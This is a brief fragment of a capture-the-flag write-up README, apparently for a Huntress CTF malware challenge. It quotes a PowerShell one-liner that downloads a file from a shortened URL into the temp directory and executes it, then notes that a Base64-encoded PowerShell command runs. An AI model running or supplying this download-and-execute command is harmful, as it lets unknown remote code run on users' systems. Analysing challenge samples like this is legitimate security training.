0x30Mushti/Huntress-CTF/Russian_Roulette/README.md

 ```
 iwr is.gd/jwr7JD -o $env:TMP/.cmd; & $env:TMP/.cmd
 ```
+Yeah, I got stuck and looked for other ways.
+It seemed like a rabbit hole to me.

 ## Process Analysis
 I can also see in the processes captured with Process Monitor that cmd spawns a PowerShell process, which then runs a Base64 string.